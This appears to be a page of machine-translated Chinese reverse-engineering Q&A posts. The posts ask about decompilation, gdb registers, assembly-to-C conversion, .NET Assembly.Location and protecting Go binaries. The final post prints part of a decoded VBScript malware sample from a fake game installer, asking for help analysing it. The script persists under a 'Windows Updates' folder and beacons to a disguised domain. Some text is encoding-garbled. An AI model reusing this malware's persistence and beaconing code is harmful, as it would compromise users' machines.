标签: reverse-engineering

JAD反编译文件100%准确吗？我正在反编译一些 jar 文件以获取源代码，当我尝试使用这些 java 文件构建项目时，它没有显示准​​确的构建。是我做错了还是反编译后的文件与原始文件不完全一样。

我正在尝试学习汇编和逆向，当我尝试调试一个简单的chall时，我想在gdb中查看我的寄存器，其中包含信息寄存器\nRax 0x7fffffdd90\n现在想知道rax在哪里。是 point\xc3\xaeg 到 ,( inpretrd rax 现在我想打印 [rax] ) \n或者是否可以在寄存器中设置一个指向的值 \nInteed 执行 set $eax = $rax \n我想做类似 set 的事情$eax = [$rax]

感谢帮助

所以我在汇编中有以下代码：

我知道该函数的参数有两个（x 和 y 或任何字母）。问题是我不知道如何从汇编代码中查看该函数是否返回任何内容，因为它只说ret. 这个函数会被视为 void 或 int 吗？任何有助于理解的解释将不胜感激。

有人可以解释一下_IO_stdin_used下面这一行的内容吗：

114a:   48 8d 3d b3 0e 00 00    lea    rdi,[rip+0xeb3]        # 2004 <_IO_stdin_used+0x4>

抱歉这个菜鸟问题。

我需要一个函数的帮助，我认为这并不难，有人可以将其转换为C，以便从中获取逻辑吗？

0x004011cf mov al, byte [esi]

| : 0x004011d1 and eax, 0xff

| : 0x004011d6 mul ebx

| : 0x004011d8 inc esi

| : 0x004011d9 add edi, eax

| : 0x004011db inc ebx

| : 0x004011dc dec ecx

| `=< 0x004011dd jne 0x4011cf

我想在我的应用程序中在运行时修改Assembly.Location属性.我正在从资源加载.NET程序集,并且加载的程序集(从内存加载)将此字段设置为空并且它会破坏应用程序功能.

我无法控制他们的源代码.我知道如何在我自己的代码中解决这个bug,但事实并非如此.当他们使用Assembly.Location并获得一个空字符串时,问题就开始了.

http://msdn.microsoft.com/en-us/library/system.reflection.assembly.location.aspx

这是只读的.有没有低级别的方法呢？有任何想法吗？

我的应用程序是嵌入在资源中的那些应用程序的加载器,因此它不依赖于它们.尝试从内存中加载任何程序集并检查那些已加载程序集的Assembly.Location字段,它将为空.它们没有位置,因为它们是从内存中加载的,我仍然希望通过.NET内部修改或任何其他方法来改变它.

压缩的程序集无法解压缩到磁盘.如果你只是知道如何实现它,我不介意重大问题的危险.

当我们使用gdb或任何反汇编程序分析目标文件时，会将断点放入其中。它随时显示寄存器的当前状态。可能有许多程序在后台运行。这些程序中的每一个也将使用这些寄存器并可以更改其值。

当其他进程可能不断在改变它时，反汇编程序如何维护我们程序的寄存器值？

我想知道是否有任何标准方法可以通过蛮力逆转 AND 例程。例如，我有以下转换：

MOV(eax, 0x5b3e0be0)  <- Here we move 0x5b3e0be0 to EDX.
MOV(edx, eax)  # Here we copy 0x5b3e0be0 to EAX as well.
SHL(edx, 0x7)  # Bitshift 0x5b3e0be0 with 0x7 which results in 0x9f05f000
AND(edx, 0x9d2c5680)  # AND 0x9f05f000 with 0x9d2c5680 which results in 0x9d045000
XOR(edx, eax)  # XOR 0x9d045000 with original value 0x5b3e0be0 which results in 0xc63a5be0

我的问题是如何蛮力和反转这个例程（即将 0xc63a5be0 转换回 0x5b3e0be0）

我的一个想法（不起作用）是使用 PeachPy 实现：

#Input values
MOV(esi, 0xffffffff) < Initial value to AND with, which will be decreased by …

实际上,我是一名PHP开发人员.我想卖掉我的PHP产品.

所以,我想保护PHP中的一些主要源代码.但这在PHP中是不可能的.

我也知道Golang.所以,我想在golang代码中构建秘密算法并编译成二进制代码.

最后,我想用PHP代码&&二进制程序保护我的PHP主要算法.

我的疑问是:

当我将golang源代码编译成二进制文件时.是否可以从二进制文件中获取golang源代码？

我从 oceanofgames.com 下载了一款游戏。其中有一个名为“Step 2 - Extract Setup.rar”的存档。它几乎存在于从 oceanofgames.com 下载的所有游戏中。当我提取并运行它时，它被检测为恶意软件。我有 Avast，它显示此 消息

它在 %appdata%\Windows Updates 文件中创建“Windows Updates service.vbs”和“encode.vbs”。“encode.vbs”将“Windows Updates service.vbs”转换为“Windows Updates service.vbe ”，然后运行它。我解码了vbe文件。请告诉我这是在做什么。

on Error Resume Next

Sub Pause(NSeconds)

Wscript.Sleep(NSeconds*3000)

End Sub

Dim visualcpp

Set visualcpp = CreateObject("WScript.Shell")

counter = True

While counter = True

website = "www.google.com.739471594492594.windows-display-service.com"

checkstring = "ping -n 1 -w 300 " & website

status = visualcpp.Run(checkstring, 0 , True)

If status = 0 Then

counter = False

Else

Pause(21)

End If …